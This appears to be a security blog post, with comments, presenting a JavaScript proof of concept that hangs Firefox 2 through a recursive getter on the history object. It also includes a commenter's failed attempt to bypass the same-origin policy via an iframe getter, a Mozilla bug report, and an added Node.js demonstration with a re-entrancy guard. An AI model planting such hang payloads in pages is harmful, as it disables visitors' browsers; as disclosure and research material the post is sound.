Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:-

window.onload = function() {

    // Define an enumerable getter named "x" on the history object.
    history.__defineGetter__("x", function() {
        // Enumerating this (the history object) yields "x" itself, so
        // reading this[i] below invokes this same getter again, recursively.
        for (var i in this) {
            try {
                alert(this[i]);
            } catch(e) {
            }
        }
    });

    // Read the property once to start the recursion.
    history.x;
}

Tested on Firefox 2.0.0.9 (Mac): a window pops up with two blank buttons and you are unable to do anything without using force quit.
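As an added example, not code from the post or its comments: the same enumeration-driven recursion run in Node.js, where the engine ends it with a RangeError, next to a getter with a re-entrancy guard that never recurses. The object obj and the counters are names chosen here.

```javascript
// Added example: not from the original post. Shows the recursion the post
// relies on (a getter enumerating its own object) and a guard against it.
// obj, calls, lastError and inGetter are names chosen here for illustration.

// Unguarded: the post's pattern with a counter in place of alert().
function runUnguarded() {
  const obj = {};
  let calls = 0;
  let lastError = null;
  Object.defineProperty(obj, "x", {
    enumerable: true, // for..in only visits enumerable keys, "x" included
    get() {
      calls++;
      for (const k in this) {
        try {
          void this[k]; // k === "x": this re-enters the getter, one level deeper
        } catch (e) {
          // Deepest frame only: the engine bounds the recursion with a
          // RangeError ("Maximum call stack size exceeded"); record it.
          lastError = e;
        }
      }
    },
  });
  obj.x;
  return { calls, hitLimit: lastError instanceof RangeError };
}

// Guarded: a re-entrancy flag turns any nested call into a no-op, so
// enumerating the object from inside the getter cannot recurse.
function runGuarded() {
  const obj = {};
  let calls = 0;
  let inGetter = false;
  Object.defineProperty(obj, "x", {
    enumerable: true,
    get() {
      calls++;
      if (inGetter) return undefined; // already running: refuse to re-enter
      inGetter = true;
      try {
        for (const k in this) void this[k]; // reads "x" once, gets undefined
      } finally {
        inGetter = false;
      }
      return "done";
    },
  });
  return { value: obj.x, calls };
}
```

The unguarded run ends by itself because the engine, not the page, caps the stack; the guarded getter is the shape a library author would use for any accessor that walks its own object.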

9 Responses to “Firefox history DOS attack”

  1. Awesome AnDrEw writes:

    Nice work, Gareth. I’m really pulling that you figure out a way to break the same origin policy simply because it would be quite impressive.

  2. Gareth Heyes writes:

    Thanks 🙂 Yeah, that’s my plan. I’m not sure it’s possible because the objects are spoofed getters. I’m having fun trying, though.

  3. .mario writes:

    Yep – the holy grail of SOP. I’ve been trying various approaches recently but haven’t had any success yet.

    My last attempt was to fill iframes with HTML via this.innerHTML='payload' in the src attribute and trying to access the rendered content after a timeout. But Firefox manages to handle it too – any property inside contentWindow is access restricted.

  4. Gareth Heyes writes:

    Here’s my new attempt:-
    window.onload = function() {
        newElement = document.createElement('iframe');
        newElement.src = 'http://www.google.co.uk/';
        newElement.id = 'iframe';
        newElement.onload = function() {
            var doc = this.contentWindow.document;
            this.__defineGetter__('contentWindow', function() { return doc });
            x = this.contentWindow;
            delete this.contentWindow;
            delete doc;
            alert(x);
        }
        document.body.appendChild(newElement);
    }

    Doesn’t work though 🙁

  5. Gareth Heyes writes:

    Accessing body or innerHTML causes a permission error.

  6. Jesse Ruderman writes:

    Thanks for discovering and reporting this clever way to confuse Firefox with recursion. I’ve filed https://bugzilla.mozilla.org/show_bug.cgi?id=403999 with a clearer testcase — you can use any object, even ({}), in place of the history object.

  7. Gareth Heyes writes:

    Hey Jesse

    No problem! Yeah I figured it would work on any object but the history one was the one I was testing at the time.

  8. Jophn Deo writes:

    Does anyone have a study hint in order to fully appreciate the technical implications?

  9. Jesse Ruderman writes:

    Jophn, I’d start by reading old bugs in bugzilla.mozilla.org about JavaScript recursion limits, and then using those bug reports to find the relevant source code. Once you understand how they work, you might have enough information to fix the bug, or you might not — it might require knowledge of XBL or something. I don’t know, I’m more a tester than a Gecko developer 😉